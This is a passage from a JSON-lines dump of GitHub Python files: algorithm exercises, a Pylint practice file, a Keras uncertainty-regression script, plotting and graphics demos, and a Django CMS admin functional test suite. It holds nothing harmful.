board=[list(file.readline().strip()) for _ in range(n_rows)]\n \n solution()","repo_name":"JehyunJung/Code-Test-Preparing","sub_path":"algorithm/Tasks_By_Algorithms/DFS&BFS/3055.py","file_name":"3055.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"8924039711","text":"### Link:\n# https://github.com/doocs/leetcode/blob/main/solution/0100-0199/0153.Find%20Minimum%20in%20Rotated%20Sorted%20Array/README.md\n\n\n\n### Description:\n# 已知一个长度为 n 的数组,预先按照升序排列,\n# 经由 1 到 n 次 旋转后,得到输入数组。\n\n# 例��,原数组 nums = [0, 1, 2, 4, 5, 6, 7] 在变化后可能得到:\n# 若旋转 4 次,则可以得到[4, 5, 6, 7, 0, 1, 2]\n# 若旋转 7 次,则可以得到[0, 1, 2, 4, 5, 6, 7]\n\n# 注意,数组[a[0], a[1], a[2], ..., a[n - 1]]\n# 旋转一次 的结果为数组[a[n - 1], a[0], a[1], a[2], ..., a[n - 2]] \n\n# 给你一个元素值 互不相同 的数组 nums \n# 它原来是一个升序排列的数组,并按上述情形进行了多次旋转\n# 请你找出并返回数组中的最小元素 \n\n\n\n### Example:\n# 示例 1:\n# 输入: nums = [3, 4, 5, 1, 2]\n# 输出: 1\n# 解释:原数组为[1, 2, 3, 4, 5],\n# 旋转 3 次得到输入数组。\n\n# 示例2:\n# 输入:nums = [4, 5, 6, 7, 0, 1, 2]\n# 输出:0\n# 解释:原数组为[0, 1, 2, 4, 5, 6, 7] ,旋转 4 次得到输入数组。\n\n# 示例3:\n# 输入:nums = [11, 13, 15, 17]\n# 输出:11\n# 解释:原数组为[11, 13, 15, 17] ,旋转 4 次得到输入数组。\n\n\n# 提示:\n# n == nums.length\n# 1 <= n <= 5000\n# -5000 <= nums[i] <= 5000\n\n\n# nums 中的所有整数 互不相同\n# nums 原来是一个升序排序的数组,\n# 并进行了 1 至 n 次旋转\n\n\n\n### Solution:\n# 二分查找\n# 若 nums[m] > nums[r],说明最小值在 m 的右边\n# 否则说明最小值在 m 的左边\n\nclass Solution:\n def findMin(self, nums):\n l, r = 0, len(nums) - 1\n if nums[l] < nums[r]:\n return nums[0]\n while l < r:\n m = (l + r) // 2\n if nums[m] > nums[r]:\n l = m + 1\n else:\n r = m\n return nums[l]\n\n\nprint(Solution().findMin(nums=[5,7,9,1,3,4]))\nprint(Solution().findMin(nums=[9,2,4,6,7,8]))\n","repo_name":"wendyZhang98/Leetcode-Solutions","sub_path":"Array/[二分查找]Find Minimum in Rotated Sorted Array.py","file_name":"[二分查找]Find Minimum in Rotated Sorted Array.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"19695776348","text":"\"\"\"\nThis is a file for trying out Pylint\n\"\"\"\nimport os\n# import this_does_not_exist\n\n\ndef open_foo_file(): # method that does a thing\n \"\"\"Method that does a thing\"\"\"\n try:\n os.chdir(\"subdir\")\n filedesc = open(\"foo.txt\", \"w\", encoding=\"utf8\")\n contents = filedesc.readlines()\n filedesc.close()\n except IOError:\n print(\"couldn't find the file or directory\")\n return contents\n\n\nif __name__ == \"__main__\":\n open_foo_file()\n","repo_name":"TheMany172/Makers_extending_testing_week2","sub_path":"extending-testing/phase6/04_resources/lint_me.py","file_name":"lint_me.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"42021522643","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom keras_uncertainty.losses import regression_gaussian_nll_loss, regression_gaussian_beta_nll_loss\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom keras.layers import Dense, Input\nimport tensorflow as tf\n\nfrom tensorflow import keras\nfrom tensorflow.keras.models import Model\nfrom sklearn.model_selection import train_test_split\n\n\"\"\"\nCode provided by the assignment and retrieved from:\nhttps://github.com/mvaldenegro/keras-uncertainty/blob/master/keras_uncertainty/losses.py\nWe use the Gaussian Negative Log-Likelihood loss: \nLoss commonly used in uncertainty quantification and probabilistic forecasting\n\"\"\"\nimport keras_uncertainty.backend as K\n\ntf.compat.v1.disable_eager_execution()\n\n\"\"\"\nCreates a model (one dense input layer, one hidden dense layer,\n1 dense output layer for mean and another one for variance.\nReturns the predicted mean and std (squared variance).\n\"\"\"\ndef train_standard_model(x_train, y_train, domain):\n inp = Input(shape=(1,))\n x = Dense(32, activation=\"relu\")(inp)\n x = Dense(32, activation=\"relu\")(x)\n mean = Dense(1, activation=\"linear\")(x)\n var = Dense(1, activation=\"softplus\")(x)\n\n train_model = Model(inp, mean)\n pred_model = Model(inp, [mean, var])\n\n opt = keras.optimizers.Adam (learning_rate=0.0001)\n\n train_model.compile(loss=regression_gaussian_nll_loss(var), optimizer=opt)\n pred_model.compile (loss=regression_gaussian_nll_loss (var), optimizer=opt)\n train_model.fit(x_train, y_train, verbose=2, epochs=300)\n\n mean_pred, var_pred = pred_model.predict(domain)\n std_pred = np.sqrt(var_pred)\n\n return mean_pred, std_pred\n\n# amplitude for noise\nA = 3\n\n# number of samples for training the model\nnum_samples = 10000\n\n# generating an amount of num_samples between -5 and 5\nsample = np.linspace(-5, 5, num=num_samples)\nprint(\"Input array : \\n\", sample)\n\nnoise_sigma = 0.5\n\n# transform the data samples into sinusoid function and add noise\nx = A * np.sin(sample) + np.random.normal(loc = 0.0, scale = noise_sigma, size = num_samples)\ny = A * np.sin(sample)\ny = y.reshape((-1, 1))\n\n# split data samples and their labels into training and testing\ndata_train,data_test,labels_train,labels_test = train_test_split(x,y, test_size = 0.40)\n\nprint(f'μ={y.mean()}')\nprint(f'σ={y.std()}')\n\n# train the model, return predicted mean and std\npredicted_mean, predicted_std=train_standard_model(data_train, labels_train, y)\n\ny_pred_mean = predicted_mean.reshape((-1,))\ny_pred_std = predicted_std.reshape((-1,))\n\n# add the upper and lower std to the mean\ny_pred_up_1 = y_pred_mean + y_pred_std\ny_pred_down_1 = y_pred_mean - y_pred_std\n\n\nprint (f'average standard deviation: {np.mean(y_pred_std)}')\n\n# plot the noisy data points on which the model trained\nplt.scatter (range (len (x)), x, label=\"Noisy Data Points\", color='green')\nplt.plot(y, label= \"Sine\", linewidth = 3)\n\n# plot the predicted mean\nplt.plot(y_pred_mean, label = \"Predicted mean\", linewidth = 3)\n# plot std on the mean\nplt.fill_between (range (num_samples), y_pred_mean-y_pred_std, y_pred_mean+y_pred_std, alpha=0.2, label=\"Standard Deviation\", color='orange')\nplt.legend()\nplt.show ()\n","repo_name":"SarahEmaAllam/Uncertainty-in-ML","sub_path":"week 1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"20275404096","text":"from JMSSGraphicsV12 import *\nimport math\n\nwidth = 1200\nheight = 800\nfps = 60\n\njmss = Graphics(width = width, height = height, title = \"Bouncing Ball\", fps = fps)\n\nball = jmss.loadImage(\"ball.png\")\n\nball_pos = [0,0]\nspeed = 0\ncount = 0\n\n@jmss.mainloop\ndef Parabola():\n global ball_pos, speed, count\n\n ball_pos[0] = 0\n jmss.clear(0,0,0,1)\n\n while ball_pos[0] <= 1152:\n ball_pos[1] = 200*math.sin(2*ball_pos[0] - speed)+400\n jmss.drawImage(ball, ball_pos[0], ball_pos[1])\n ball_pos[0] += (22 + count)\n\n jmss.drawText(str(count + 22), 0, 0)\n\n if jmss.isKeyDown(KEY_SPACE) != True:\n count += 0.003\n speed += 0.03\n\njmss.run()\n","repo_name":"MAK064/Python","sub_path":"Big Data Challenges/WaveForms.py","file_name":"WaveForms.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"34031808381","text":"#import Traffic_DFs, Traffic_Dataframe, parsing\nimport os,io,re\nimport matplotlib.pyplot as plt \nplt.style.use('ggplot')\nimport seaborn as sns\nimport numpy as np\nimport csv\nimport itertools as it \nimport glob\nimport pandas as pd \nfrom scipy import interpolate\nimport time\n\n#combine all csv files in the csv folder\n\t\nBASE = \"/Users/radhikanikam/Downloads/Traffic_Data\"\nPATH = \"/Day3/CSV/\"\n\ndef get_daily(PATH,axis):\n\tax = axis\n\tfolder = BASE+PATH\n\tos.chdir(folder)\n\tfiles = glob.glob('*.csv')\n\tf = {}\n\tdata = pd.DataFrame()\n\theader_saved = False\n\t#with open('output.csv','w') as fout:\n\tdata = pd.read_csv(files[0])\n\tdata = data[['LinkID','RoadName']].reset_index(drop = True)\n\tprint(len(files))\n\tfor i in range(len(files)):\n\t\tres = re.findall(\"\\d+\", files[i])\n\t\tf[i] = pd.read_csv(files[i])\n\t\tf[i][['Speed' + str(res)]] = f[i][['Speed']]\n\t\tf[i] = f[i][['LinkID','Speed'+str(res)]].reset_index(drop = True)\n\t\tdata = pd.merge(data,f[i],on = 'LinkID', how = 'outer', left_index = True)\t\n\t\t#data[['Speed' + str(i)]] =(f[i][['Speed' + str(i)]])\t\t\n\t#print(data.head())\n\tfill_value = pd.DataFrame({col: data.mean(axis=1) for col in data.columns})\n\t#data.fillna(fill_value) \n\t#data = data.fillna(data.mean(axis=0))\n\t#data.to_csv('Day_stats.csv')\n\t#g = sns.FacetGrid(data, row = data.loc[data['RoadName'] == 'SANDY LANE'])\n\t#g = g.map(plt.hist,)\n\tdata.drop(['LinkID'], inplace = True)\n\t\n\t\n\tlabels = data.columns[2:]\n\tx = data.as_matrix()\n\troad1 = 'OUTRAM ROAD'\n\troad2 = 'TIONG BAHRU ROAD'\n\troad3 = 'KEPPEL ROAD'\n\txes = np.array((data[data['RoadName'] == road1].as_matrix()[0,2:]).tolist())\n\txis = np.array((data[data['RoadName'] == road2].as_matrix()[0,2:]).tolist())\n\txas = np.array((data[data['RoadName'] == road3].as_matrix()[0,2:]).tolist())\n\tcall =np.array([i for i in range(len(xes))])\n\t#print(xes)\n\t# xe = np.arange(0,75)\n\ts1mask = np.isfinite(xes)\n\ts2mask = np.isfinite(xis)\n\ts3mask = np.isfinite(xas)\n\n\t# f = interpolate.interp1d(call,xes, kind = 'linear') #,fill_value =\"extrapolation\")\n\t# plt.plot(call,xes,'o', f(xe),'-')\n\t# plt.xticks(call,labels, rotation = '90')\n\t# #data[data['RoadName'] == 'SANDY LANE'].plot.bar()\n\n\t# from scipy.interpolate import spline\n\n\t# xnew = np.linspace(call[0],call[len(call) -1],len(call)) #300 represents number of points to make between T.min and T.max\n\n\t#f= interpolate.interp1d(call,xes) #,fill_value =\"extrapolation\")\n\t\n\tax.plot(call[s1mask],xes[s1mask],marker = 'o',linestyle = '-', label = road1)\n\tax.plot(call[s2mask],xis[s2mask],marker = 'o',linestyle = '-', label = road2)\n\tax.plot(call[s3mask],xas[s3mask],marker = 'o',linestyle = '-', label = road3)\n\tplt.xticks(call,labels, rotation = '90')\n\tax.legend(loc = 'best')\n\t#plt.savefig(str(axis) +'.png')\n\t\n\nif __name__ == \"__main__\":\n\tfig = plt.figure()\n\tax1 = fig.add_subplot(211)\n\tax1.set_title('Thursday')\n\tt1 = time.time()\n\tget_daily(PATH,ax1)\n\tt2 = time.time()\n\tprint(t2-t1)\n\tPATH =\"/Day4/CSV/\"\n\tax2 = fig.add_subplot(212)\n\tax2.set_title('Friday')\n\tget_daily(PATH,ax2)\n\tplt.show()\n\n","repo_name":"radsn23/ITS_thesis","sub_path":"daily_trend.py","file_name":"daily_trend.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"19927057164","text":"# -*- coding: utf-8 -*-\n\"\"\"Django page CMS functionnal tests suite module.\"\"\"\nfrom basic_cms.models import Page, Content, PageAlias\nfrom basic_cms.tests.testcase import TestCase\n\nimport django\n\nimport datetime\n\n\nclass FunctionnalTestCase(TestCase):\n \"\"\"Django page CMS functionnal tests suite class.\"\"\"\n\n def test_add_page(self):\n \"\"\"Test that the add admin page could be displayed via the\n admin\"\"\"\n c = self.get_admin_client()\n\n response = c.get('/admin/basic_cms/page/add/')\n self.assertEqual(response.status_code, 200)\n\n def test_create_page(self):\n \"\"\"Test that a page can be created via the admin.\"\"\"\n c = self.get_admin_client()\n\n page_data = self.get_new_page_data()\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n slug_content = Content.objects.get_content_slug_by_slug(\n page_data['slug']\n )\n assert(slug_content is not None)\n page = slug_content.page\n self.assertEqual(page.title(), page_data['title'])\n self.assertEqual(page.slug(), page_data['slug'])\n self.assertNotEqual(page.last_modification_date, None)\n\n def test_delete_page(self):\n \"\"\"Create a page, then delete it.\"\"\"\n c = self.get_admin_client()\n page_data = self.get_new_page_data()\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n slug_content = Content.objects.get_content_slug_by_slug(\n page_data['slug']\n )\n assert(slug_content is not None)\n pageCount = Page.objects.count()\n page = slug_content.page\n page.delete()\n slug_content = Content.objects.get_content_slug_by_slug(\n page_data['slug']\n )\n assert(slug_content is None)\n self.assertEqual(Page.objects.count(), pageCount - 1)\n\n def test_slug_collision(self):\n \"\"\"Test a slug collision.\"\"\"\n self.set_setting(\"PAGE_UNIQUE_SLUG_REQUIRED\", True)\n\n c = self.get_admin_client()\n\n page_data = self.get_new_page_data()\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n self.set_setting(\"PAGE_UNIQUE_SLUG_REQUIRED\", False)\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertEqual(response.status_code, 200)\n\n page1 = Content.objects.get_content_slug_by_slug(page_data['slug']).page\n page_data['position'] = 'first-child'\n page_data['target'] = page1.id\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n page2 = Content.objects.get_content_slug_by_slug(page_data['slug']).page\n self.assertNotEqual(page1.id, page2.id)\n\n def test_details_view(self):\n \"\"\"Test the details view basics.\"\"\"\n\n c = self.get_admin_client()\n\n response = c.get(self.get_page_url())\n self.assertEqual(response.status_code, 404)\n\n page_data = self.get_new_page_data()\n page_data['status'] = Page.DRAFT\n response = c.post('/admin/basic_cms/page/add/', page_data)\n\n response = c.get(self.get_page_url())\n self.assertEqual(response.status_code, 200)\n\n page_data = self.get_new_page_data()\n page_data['status'] = Page.PUBLISHED\n page_data['slug'] = 'test-page-2'\n page_data['template'] = 'pages/examples/index.html'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n\n response = c.get(self.get_page_url('test-page-2'))\n self.assertEqual(response.status_code, 200)\n\n def test_edit_page(self):\n \"\"\"Test that a page 
can be edited via the admin.\"\"\"\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n page_data = self.get_new_page_data()\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n page = Page.objects.all()[0]\n response = c.get('/admin/basic_cms/page/%d/' % page.id)\n self.assertEqual(response.status_code, 200)\n page_data['title'] = 'changed title'\n page_data['body'] = 'changed body'\n response = c.post('/admin/basic_cms/page/%d/' % page.id, page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n page = Page.objects.get(id=page.id)\n self.assertEqual(page.title(), 'changed title')\n body = Content.objects.get_content(page, 'en-us', 'body')\n self.assertEqual(body, 'changed body')\n\n def test_site_framework(self):\n \"\"\"Test the site framework, and test if it's possible to\n disable it.\"\"\"\n\n from basic_cms import settings as pages_settings\n\n # it's not possible to enforce PAGE_USE_SITE_ID in the tests\n if not pages_settings.PAGE_USE_SITE_ID:\n #TODO: use unittest.skip when on 2.7\n return\n\n # this is necessary to make the test pass\n setattr(pages_settings, \"SITE_ID\", 2)\n\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n page_data = self.get_new_page_data()\n page_data[\"sites\"] = [2]\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n\n page = Content.objects.get_content_slug_by_slug(page_data['slug']).page\n self.assertEqual(page.sites.count(), 1)\n self.assertEqual(page.sites.all()[0].id, 2)\n\n page_data = self.get_new_page_data()\n page_data[\"sites\"] = [3]\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n\n # we cannot get a slug that doesn't exist\n content = Content.objects.get_content_slug_by_slug(\"this doesn't exist\")\n self.assertEqual(content, None)\n\n # we cannot get the data posted on another site\n content = Content.objects.get_content_slug_by_slug(page_data['slug'])\n self.assertEqual(content, None)\n\n setattr(pages_settings, \"SITE_ID\", 3)\n page = Content.objects.get_content_slug_by_slug(page_data['slug']).page\n self.assertEqual(page.sites.count(), 1)\n self.assertEqual(page.sites.all()[0].id, 3)\n\n # with param\n self.assertEqual(Page.objects.on_site(2).count(), 1)\n self.assertEqual(Page.objects.on_site(3).count(), 1)\n\n # without param\n self.assertEqual(Page.objects.on_site().count(), 1)\n setattr(pages_settings, \"SITE_ID\", 2)\n self.assertEqual(Page.objects.on_site().count(), 1)\n\n page_data = self.get_new_page_data()\n page_data[\"sites\"] = [2, 3]\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n\n self.assertEqual(Page.objects.on_site(3).count(), 2)\n self.assertEqual(Page.objects.on_site(2).count(), 2)\n self.assertEqual(Page.objects.on_site().count(), 2)\n\n setattr(pages_settings, \"PAGE_USE_SITE_ID\", False)\n\n # we should get everything\n self.assertEqual(Page.objects.on_site().count(), 3)\n\n setattr(pages_settings, \"SITE_ID\", 1)\n\n def test_languages(self):\n \"\"\"Test posting a page with different languages\n and test that the admin views work correctly.\"\"\"\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n\n # test that the client language setting is used in add page admin\n c.cookies[\"django_language\"] = 'de'\n response = 
c.get('/admin/basic_cms/page/add/')\n\n self.assertContains(response, 'value=\"de\"')\n\n page_data = self.get_new_page_data()\n page_data[\"title\"] = 'english title'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n\n page = Page.objects.all()[0]\n self.assertEqual(page.get_languages(), ['en-us'])\n\n # test the language cache\n self.assertEqual(page.get_languages(), ['en-us'])\n\n # this test only works in versions later than 1.0.2\n django_version = django.get_version().rsplit()[0].split('.')\n if len(django_version) > 2:\n major, middle, minor = [int(v) for v in django_version]\n else:\n major, middle = [int(v) for v in django_version]\n if major >= 1 and middle > 0:\n response = c.get('/admin/basic_cms/page/%d/?language=de' % page.id)\n self.assertContains(response, 'value=\"de\"')\n\n # add a french version of the same page\n page_data[\"language\"] = 'fr-ch'\n page_data[\"title\"] = 'french title'\n response = c.post('/admin/basic_cms/page/%d/' % page.id, page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n\n # test that the frontend view uses the right parameters\n # I cannot find a way of setting the accept-language HTTP\n # header so I used django_language cookie instead\n c = self.get_admin_client()\n c.cookies[\"django_language\"] = 'en-us'\n response = c.get(page.get_url_path())\n self.assertContains(response, 'english title')\n self.assertContains(response, 'lang=\"en-us\"')\n self.assertNotContains(response, 'french title')\n\n c = self.get_admin_client()\n c.cookies[\"django_language\"] = 'fr-ch'\n response = c.get(page.get_url_path())\n self.assertContains(response, 'french title')\n self.assertContains(response, 'lang=\"fr-ch\"')\n\n self.assertNotContains(response, 'english title')\n\n # this should be mapped to the fr-ch content\n c = self.get_admin_client()\n c.cookies[\"django_language\"] = 'fr-fr'\n response = c.get(page.get_url_path())\n self.assertContains(response, 'french title')\n self.assertContains(response, 'lang=\"fr-ch\"')\n\n def test_revision(self):\n \"\"\"Test that a page can be edited several times.\"\"\"\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n page_data = self.get_new_page_data()\n response = c.post('/admin/basic_cms/page/add/', page_data)\n page = Page.objects.all()[0]\n\n page_data['body'] = 'changed body'\n response = c.post('/admin/basic_cms/page/%d/' % page.id, page_data)\n self.assertEqual(Content.objects.get_content(page, 'en-us', 'body'),\n 'changed body')\n\n page_data['body'] = 'changed body 2'\n response = c.post('/admin/basic_cms/page/%d/' % page.id, page_data)\n page.invalidate()\n self.assertEqual(Content.objects.get_content(page, 'en-us', 'body'),\n 'changed body 2')\n\n response = c.get(page.get_url_path())\n self.assertContains(response, 'changed body 2', 1)\n\n self.set_setting(\"PAGE_CONTENT_REVISION\", False)\n\n self.assertEqual(Content.objects.get_content(page, 'en-us', 'body'),\n 'changed body 2')\n\n def test_placeholder(self):\n \"\"\"\n Test that the placeholder is correctly displayed in\n the admin\n \"\"\"\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n page_data = self.get_new_page_data()\n page_data['template'] = 'pages/examples/nice.html'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n page = Page.objects.all()[0]\n response = c.get('/admin/basic_cms/page/%d/' % page.id)\n self.assertEqual(response.status_code, 200)\n\n self.assertContains(response, 
'name=\"right-column\"', 1)\n\n def test_directory_slug(self):\n \"\"\"\n Test diretory slugs\n \"\"\"\n self.set_setting(\"PAGE_UNIQUE_SLUG_REQUIRED\", False)\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n\n page_data = self.get_new_page_data()\n page_data['title'] = 'parent title'\n page_data['slug'] = 'same-slug'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n # the redirect tell that the page has been create correctly\n self.assertRedirects(response, '/admin/basic_cms/page/')\n response = c.get(self.get_page_url('same-slug/'))\n self.assertEqual(response.status_code, 200)\n\n page = Page.objects.all()[0]\n\n response = c.post('/admin/basic_cms/page/add/', page_data)\n # we cannot create 2 root page with the same slug\n # this assert test that the creation fails as wanted\n self.assertEqual(response.status_code, 200)\n\n page1 = Content.objects.get_content_slug_by_slug(page_data['slug']).page\n self.assertEqual(page1.id, page.id)\n\n page_data['title'] = 'children title'\n page_data['target'] = page1.id\n page_data['position'] = 'first-child'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n\n # finaly test that we can get every page according the path\n response = c.get(self.get_page_url('same-slug'))\n self.assertContains(response, \"parent title\", 3)\n\n response = c.get(self.get_page_url('same-slug/same-slug'))\n self.assertContains(response, \"children title\", 3)\n\n def test_page_admin_view(self):\n \"\"\"Test page admin view\"\"\"\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n page_data = self.get_new_page_data()\n page_data['slug'] = 'page-1'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n page = Content.objects.get_content_slug_by_slug('page-1').page\n self.assertEqual(page.status, 1)\n response = c.post('/admin/basic_cms/page/%d/change-status/' %\n page.id, {'status': Page.DRAFT})\n page = Content.objects.get_content_slug_by_slug('page-1').page\n self.assertEqual(page.status, Page.DRAFT)\n\n url = '/admin/basic_cms/page/%d/modify-content/title/en-us/' % page.id\n response = c.post(url, {'content': 'test content'})\n self.assertEqual(page.title(), 'test content')\n\n # TODO: realy test these methods\n url = '/admin/basic_cms/page/%d/traduction/en-us/' % page.id\n response = c.get(url)\n self.assertEqual(response.status_code, 200)\n\n url = '/admin/basic_cms/page/%d/sub-menu/' % page.id\n response = c.get(url)\n self.assertEqual(response.status_code, 200)\n\n url = '/admin/basic_cms/page/%d/get-content/%d/' % (page.id,\n Content.objects.get_content_slug_by_slug('page-1').id)\n\n response = c.get(url)\n self.assertEqual(response.status_code, 200)\n\n url = '/admin/basic_cms/page/%d/delete-content/en-us/' % page.id\n response = c.get(url)\n self.assertEqual(response.status_code, 302)\n\n def test_page_alias(self):\n \"\"\"Test page aliasing system\"\"\"\n\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n\n # create some pages\n page_data = self.get_new_page_data()\n page_data['title'] = 'home-page-title'\n page_data['slug'] = 'home-page'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n\n page_data['title'] = 'downloads-page-title'\n page_data['slug'] = 'downloads-page'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n\n # create aliases for the pages\n 
page = Page.objects.from_path('home-page', None)\n self.assertTrue(page)\n p = PageAlias(page=page, url='/index.php')\n p.save()\n\n page = Page.objects.from_path('downloads-page', None)\n self.assertTrue(page)\n p = PageAlias(page=page, url='index.php?page=downloads')\n p.save()\n\n # now check whether we can retrieve the pages.\n # is the homepage available from its alias\n response = c.get(self.get_page_url('index.php'))\n self.assertRedirects(response, self.get_page_url('home-page'), 301)\n\n # for the download page, the slug is canonical\n response = c.get(self.get_page_url('downloads-page/'))\n self.assertContains(response, \"downloads-page-title\", 3)\n\n # calling via its alias must cause redirect\n response = c.get(self.get_page_url('index.php') + '?page=downloads')\n self.assertRedirects(response,\n self.get_page_url('downloads-page'), 301)\n\n def test_page_redirect_to(self):\n \"\"\"Test a page redirected to another page.\"\"\"\n\n client = self.get_admin_client()\n\n # create some pages\n page1 = self.create_new_page(client)\n page2 = self.create_new_page(client)\n\n page1.redirect_to = page2\n page1.save()\n\n # now check whether you go to the target page.\n response = client.get(page1.get_url_path())\n self.assertRedirects(response, page2.get_url_path(), 301)\n\n def test_page_valid_targets(self):\n \"\"\"Test page valid_targets method\"\"\"\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n page_data = self.get_new_page_data()\n page_data['slug'] = 'root'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n root_page = Content.objects.get_content_slug_by_slug('root').page\n page_data['position'] = 'first-child'\n page_data['target'] = root_page.id\n page_data['slug'] = 'child-1'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertEqual(response.status_code, 302)\n c1 = Content.objects.get_content_slug_by_slug('child-1').page\n\n root_page = Content.objects.get_content_slug_by_slug('root').page\n self.assertEqual(len(root_page.valid_targets()), 0)\n self.assertEqual(str(c1.valid_targets()),\n \"[<Page: root>]\")\n\n def test_ajax_language(self):\n \"\"\"Test that language is working properly\"\"\"\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n # Activate a language other than settings.LANGUAGE_CODE\n response = c.post('/i18n/setlang/', {'language': 'fr-ch'})\n try:\n from django.utils.translation import LANGUAGE_SESSION_KEY\n except ImportError:\n LANGUAGE_SESSION_KEY = 'django_language'\n self.assertEqual(c.session.get(LANGUAGE_SESSION_KEY, False), 'fr-ch')\n\n # Make sure we're in French\n response = c.get('/admin/basic_cms/page/')\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, 'Ajouter')\n\n # Create some pages (taken from test_tree_admin_interface)\n page_data = self.get_new_page_data()\n page_data['slug'] = 'root'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n\n root_page = Content.objects.get_content_slug_by_slug('root').page\n page_data['position'] = 'first-child'\n page_data['target'] = root_page.id\n page_data['slug'] = 'child-1'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n\n child_1 = Content.objects.get_content_slug_by_slug('child-1').page\n\n page_data['slug'] = 'child-2'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n\n Content.objects.get_content_slug_by_slug('child-2').page\n\n self.assertEqual(str(Page.objects.all()),\n \"[<Page: root>, <Page: child-2>, <Page: child-1>]\")\n\n \"\"\"\n The relevant bit, fixed by rev 501: the response issued by a 
move\n command returns content localized in settings.LANGUAGE_CODE (i.e. 'en')\n even though the original AJAX request passed in the correct\n session ID localizing this client as fr-ch\n\n This is probably because the LocaleMiddleware gets instantiated\n with a couple of request_mocks which have no real connection to the\n AJAX request *but* django.utils.translation caches the active\n language on a per-thread basis.\n\n This means that the first \"bogus\" call to\n LocaleMiddleware.process_request will \"kill\" the localization\n data for the AJAX request.\n\n Rev. 501 fixes this by passing in the language code from the original\n request.\n \"\"\"\n response = c.post('/admin/basic_cms/page/%d/move-page/' % child_1.id,\n {'position': 'first-child', 'target': root_page.id})\n\n # Make sure the content response we got was in French\n self.assertContains(response, 'Auteur')\n\n def test_view_context(self):\n \"\"\"\n Test that the default view can only return the context\n \"\"\"\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n page_data = self.get_new_page_data()\n page_data['slug'] = 'page1'\n # create a page for the example, otherwise you will get an Http404 error\n c.post('/admin/basic_cms/page/add/', page_data)\n page1 = Content.objects.get_content_slug_by_slug('page1').page\n\n from basic_cms.views import details\n from basic_cms.http import get_request_mock\n request = get_request_mock()\n context = details(request, path='/page1/', only_context=True)\n self.assertEqual(context['current_page'], page1)\n\n def test_request_mockup(self):\n from basic_cms.http import get_request_mock\n request = get_request_mock()\n self.assertEqual(hasattr(request, 'session'), True)\n\n def test_tree_admin_interface(self):\n \"\"\"\n Test that moving/creating a page in the tree works properly\n using the admin interface\n \"\"\"\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n page_data = self.get_new_page_data()\n page_data['slug'] = 'root'\n\n response = c.post('/admin/basic_cms/page/add/', page_data)\n\n root_page = Content.objects.get_content_slug_by_slug('root').page\n self.assertTrue(root_page.is_first_root())\n page_data['position'] = 'first-child'\n page_data['target'] = root_page.id\n page_data['slug'] = 'child-1'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n\n child_1 = Content.objects.get_content_slug_by_slug('child-1').page\n self.assertFalse(child_1.is_first_root())\n\n page_data['slug'] = 'child-2'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n\n child_2 = Content.objects.get_content_slug_by_slug('child-2').page\n\n self.assertEqual(str(Page.objects.all()),\n \"[, , ]\")\n # move page 1 into the first position\n response = c.post('/admin/basic_cms/page/%d/move-page/' % 